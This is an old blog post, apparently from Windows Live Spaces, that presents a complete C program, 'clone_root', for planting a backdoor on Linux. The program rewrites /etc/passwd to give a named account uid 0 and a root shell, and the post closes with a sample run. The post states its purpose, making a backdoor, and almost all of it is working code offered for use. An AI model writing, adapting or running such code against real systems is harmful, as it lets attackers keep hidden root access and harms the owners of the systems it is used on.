clone root for linux by FILE

dorainm's profiledorainm's spaceBlogLists

< Previous Next >

January 01

clone root for linux by FILE

clone root for linux

we know the most easy method to make a backdoor is that create/edit a account with uid=0.

the program can edit the pointed account's uid to "ZERO".

in this way, the account can be known as root.

---------------------------------- clone_root.c ------------------------------------

#include "stdio.h"
#include "string.h"

#define MAXBUF 256

int main(int argc, char *argv[])
{
      FILE *fp,*mfp;             //two file piont
      char buf[MAXBUF];       //buffer
      int bIn;                      //whether the account existed.
      char accountname[MAXBUF];       //the accountname with the end of ":"
      char *filename[]={"/etc/passwd","./tmp_cr"};       //two files' name

      /*display the logo of the program*/
      printf("\nclone root version 1.0\t\tby dorainm\tdorainm@gmail.com");
      printf("\n--------------------------------------------------------------------------");
      printf("\nmake sure that you run this program as root\n");
      printf("\tor your account can write the passwd file");

      /*display the usage when the wrong arguments*/
      if(argc!=2){
            printf("\nUsage:\t%s username\n\n",argv[0]);
            exit(1);
      }

      /*append the char ":" to the end of the accountname, in this way,
      we can check whether the account is existed accurately. or, there will be no differents
      between the account "example1" and "example2" when we clone the account "example"*/
      strcpy(accountname,argv[1]);
      strcat(accountname,":");

      /*check whether can open the "passwd" file*/
      if((fp=fopen(filename[0],"r"))==NULL){
            printf("\nError: can not open the file %s.\n\n",filename[0]);
            exit(2);
      }

      /*check whether can create the "temp" file*/
      if((mfp=fopen(filename[1],"w"))==NULL){
            printf("\nError: can not creat the tmp file %s.\n\n",filename[1]);
            exit(3);
      }

      /*initialized the variable "bIn"; check the account AccountName&":" already be existed or not.
      read one line in the "passwd" file, if the pointed account name is included in this line,
      replace it with the new line, or copy the old line to the new one*/
      bIn=0;
      while(fgets(buf,MAXBUF,fp)!=NULL){
            if(strstr(buf,accountname)){
                     bIn=1;
                     fprintf(mfp,"%s:!:0:0:%s:/root:/bin/sh\n",argv[1],argv[1]);
            }else{
                     fprintf(mfp,"%s",buf);
            }
      }

      /*close the file pointers*/
      fclose(fp);
      fclose(mfp);

      /*when the account is not existed, display the error messang and remove the temp file*/
      if(bIn==0){
            printf("\nError: the account \"%s\" is not existed.\n\n",argv[1]);
            system("rm ./tmp_cr");
            exit(4);
      }

      /*congratulations, replace the passwd file, and now the pointed account is know as "root"*/
      system("mv ./tmp_cr /etc/passwd");
      printf("\nclone the account \"%s\" is completed successfully.\n\n",argv[1]);
      return 0;
}

--------------------------------- end of file ---------------------------------

[root@dorainm clone_root]# ./clone_root

clone root version 1.0             by dorainm    dorainm@gmail.com
--------------------------------------------------------------------------
make sure that you run this program as root
      or your account can write the passwd file
Usage:  ./clone_root username

7:54 PM | Blog it | Linux Programming

Comments

To add a comment, sign in with your Windows Live ID (if you use Hotmail, Messenger, or Xbox LIVE, you have a Windows Live ID). Sign in

Don't have a Windows Live ID? Sign up

Trackbacks

Weblogs that reference this entry

None